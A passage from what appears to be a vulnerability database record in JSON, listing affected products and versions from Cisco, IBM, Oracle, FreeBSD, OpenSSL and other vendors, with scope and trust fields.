"vendor": "cisco", "version": "0" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.2(1)" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media players series 5.4 rb", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.11-28" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "qradar", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "security appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.31" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.5" }, { "model": "prime optical for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "pureapplication system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.2.1" }, { "model": "abyp-2t-1s-1l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.1.0" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.17" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.19" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "project openssl 1.0.1r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.3" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.10" }, { "model": "netezza platform software 7.2.0.4-p2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5.0.997" }, { "model": "anyconnect secure mobility client for os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.44" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.0" }, { "model": "unified ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "lancope stealthwatch flowsensor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "connected analytics for collaboration 1.0.1q", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.26" }, { "model": "abyp-2t-1s-1l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(2)" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "mmp server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30.0-13" }, { "model": "abyp-10g-2sr-2lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.51" }, { "model": "tivoli provisioning manager for images build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "unified communications for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.6.7" }, { "model": "prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.3.4.2-4" }, { "model": "anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.6.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.16" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2.1" }, { "model": "telepresence server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70104.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.4" }, { "model": "packet tracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2" }, { "model": "openssh for gpfs for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.0.31" }, { "model": "agent for openflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.0.7" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "cognos business intelligence interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.117" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.51" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(3)" }, { "model": "globalprotect agent", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "3.1.0" }, { "model": "netezza platform software 7.1.0.9-p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "abyp-2t-2s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "webex meetings for wp8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.0" }, { "model": "webex meetings for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.1" }, { "model": "mds series multilayer switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "ios software and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.3.1" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "webex meeting center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.0.5" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.15-36" }, { "model": "ace application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.34" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.0" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.08" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.10" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1)" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.0.22" }, { "model": "security network controller 1.0.3387m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "mobile foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings client hosted t31r1sp6", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "cloud manager with openstack interim fix1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "9.3-release-p35", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller 1.0.3379m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.8" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3x000" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.18" }, { "model": "packet tracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.3" }, { "model": "unified sip proxy", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.12" }, { "model": "abyp-0t-4s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "10.2-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.7" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "spa50x series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "netezza platform software", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.9" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "abyp-4ts-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.17" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.5" }, { "model": "netezza platform software 7.2.0.8-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ata series analog terminal adaptor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "digital media players series 5.4 rb", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.14" }, { "model": "virtualization experience media engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "rational application developer for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "abyp-10g-4lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3200" }, { "model": "abyp-10g-4lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.8" }, { "model": "9.3-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.6" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.10" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.43" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.0.0" }, { "model": "unified communications for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa122 ata with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli composite application manager for transactions if03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.18" }, { "model": "rational application developer for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4" }, { "model": "identity services engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2.1" }, { "model": "10.1-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.7" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.16" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.4" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(2.10000.5)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.26" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.14" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.35" }, { "model": "telepresence mx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3204.4" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "qradar siem/qrif/qrm/qvm patch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.71" }, { "model": "digital media players series 5.3 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "telepresence profile series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.41" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.36" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "openssh for gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "abyp-0t-0s-4l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.11.6" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "jabber for android mr", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "abyp-4t-0s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "netezza platform software 7.2.0.4-p3", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "project openssl 1.0.2f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.22" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2919" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "connected grid router-cgos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.30" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.9" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.19" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.10" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "lancope stealthwatch smc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "unified ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "telepresence server on virtual machine mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "anyconnect secure mobility client", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60008.3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.6" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30.2-9" }, { "model": "abyp-0t-2s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70008.3" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.2" }, { "model": "webex meetings server ssl gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.25" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-110" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "ironport email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.15" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.2" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-113" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "spa30x series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30-12" }, { "model": "tivoli netcool system service monitors", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.3" }, { "model": "webex meetings client on premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70100" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.3(1)" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "bm security identity governance and intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.12" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5(.1.131)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.20" }, { "model": "project openssl 1.0.2d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.3" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1(1)" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.3.0" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.8" }, { "model": "spa525g", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "algo audit and compliance if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.32" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.4" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "9.3-release-p25", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "abyp-0t-2s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.26" }, { "model": "netezza platform software", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.3" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.29-9" }, { "model": "series ip phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9971" }, { "model": "abyp-2t-0s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "nexus series switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.5" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.6" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3387" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.1.1" }, { "model": "webex messenger service", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.20" }, { "model": "abyp-10g-4sr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "telepresence server mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70104.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "media experience engines", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "10.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.2" }, { "model": "security network controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": 